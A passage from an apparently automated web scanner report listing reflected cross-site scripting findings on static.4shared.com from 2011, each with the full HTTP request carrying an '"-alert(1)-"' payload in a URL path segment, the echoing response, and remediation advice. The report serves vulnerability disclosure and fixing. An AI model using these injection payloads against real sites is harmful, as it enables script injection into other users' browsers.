Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons73080&quot;-alert(1)-&quot;bd5e5c0b567/16x16/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=78DFFF9C129B528E44FF3EABA7D2E061.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons73080"-alert(1)-"bd5e5c0b567/16x16/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

1.261. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b306f"-alert(1)-"f931fa8a6ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16b306f"-alert(1)-"f931fa8a6ff/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16b306f&quot;-alert(1)-&quot;f931fa8a6ff/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C523391335A36A28DA2975087B407E0D.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16b306f"-alert(1)-"f931fa8a6ff/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.262. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34543"-alert(1)-"e3036abd11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16/stop.gif34543"-alert(1)-"e3036abd11 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16/stop.gif34543&quot;-alert(1)-&quot;e3036abd11
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6DA068FC8810374C5C44DC7CA61476B5.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:29 GMT
Content-Length: 36244


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16/stop.gif34543"-alert(1)-"e3036abd11";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.263. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d12c3"-alert(1)-"47c5b2bb8a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesd12c3"-alert(1)-"47c5b2bb8a7/icons/misc/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /imagesd12c3&quot;-alert(1)-&quot;47c5b2bb8a7/icons/misc/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E8D748AE8041A79D72ED23919C2AEE58.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:11 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/imagesd12c3"-alert(1)-"47c5b2bb8a7/icons/misc/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.264. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e2cc"-alert(1)-"2ebb09db008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons9e2cc"-alert(1)-"2ebb09db008/misc/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons9e2cc&quot;-alert(1)-&quot;2ebb09db008/misc/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CE99907F2C97B1C657CAD61A79B27113.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons9e2cc"-alert(1)-"2ebb09db008/misc/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.265. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e87a8"-alert(1)-"2d8bde7f418 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/misce87a8"-alert(1)-"2d8bde7f418/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/misce87a8&quot;-alert(1)-&quot;2d8bde7f418/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=64D6C4F34E3F9C45C1E0317EB44FE0FF.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/misce87a8"-alert(1)-"2d8bde7f418/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.266. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a755"-alert(1)-"4ac0d6a008 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/misc/upload.gif2a755"-alert(1)-"4ac0d6a008 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/misc/upload.gif2a755&quot;-alert(1)-&quot;4ac0d6a008
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E5DB1FF8F3B4EA16522E1274F52FB585.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:28 GMT
Content-Length: 36238


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/misc/upload.gif2a755"-alert(1)-"4ac0d6a008";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.267. http://static.4shared.com/images/ipic.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/ipic.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f14c"-alert(1)-"566c054463f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images3f14c"-alert(1)-"566c054463f/ipic.jpg HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images3f14c&quot;-alert(1)-&quot;566c054463f/ipic.jpg
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BEA4F5F1AC669555A6514786824F1450.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:49 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images3f14c"-alert(1)-"566c054463f/ipic.jpg";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.268. http://static.4shared.com/images/ipic.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/ipic.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b4f"-alert(1)-"94dac4f1560 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/ipic.jpg20b4f"-alert(1)-"94dac4f1560 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/ipic.jpg20b4f&quot;-alert(1)-&quot;94dac4f1560
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5BAF51C7A76C26D994BA2C87560631AE.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:55 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/ipic.jpg20b4f"-alert(1)-"94dac4f1560";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.269. http://static.4shared.com/js/dw_drag.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_drag.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79778"-alert(1)-"1c264739c21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js79778"-alert(1)-"1c264739c21/dw_drag.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js79778&quot;-alert(1)-&quot;1c264739c21/dw_drag.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA91D5B32A64AEF6FE6CA52D10425C19.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:23 GMT
Content-Length: 36149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js79778"-alert(1)-"1c264739c21/dw_drag.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.270. http://static.4shared.com/js/dw_drag.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_drag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf87f"-alert(1)-"6f121a1eda2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_drag.jsbf87f"-alert(1)-"6f121a1eda2?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_drag.jsbf87f&quot;-alert(1)-&quot;6f121a1eda2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BF6758CFC672FC39672A2E95C372AAFE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:27 GMT
Content-Length: 36160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_drag.jsbf87f"-alert(1)-"6f121a1eda2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.271. http://static.4shared.com/js/dw_event.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_event.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a920"-alert(1)-"365bd27b3c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js7a920"-alert(1)-"365bd27b3c3/dw_event.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js7a920&quot;-alert(1)-&quot;365bd27b3c3/dw_event.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=14ADD58AABB5318B45D845F998D1168A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:15 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js7a920"-alert(1)-"365bd27b3c3/dw_event.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.272. http://static.4shared.com/js/dw_event.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_event.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27f2c"-alert(1)-"68c4ab76dbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_event.js27f2c"-alert(1)-"68c4ab76dbc?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_event.js27f2c&quot;-alert(1)-&quot;68c4ab76dbc
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA0777C4018C733CAB00C1514B66D2C7.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:18 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_event.js27f2c"-alert(1)-"68c4ab76dbc";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.273. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_viewport.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9a31"-alert(1)-"63ff542d0f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsb9a31"-alert(1)-"63ff542d0f7/dw_viewport.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jsb9a31&quot;-alert(1)-&quot;63ff542d0f7/dw_viewport.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6A9A71F3EE25BF897A04780FEF001C40.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:18 GMT
Content-Length: 36169


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
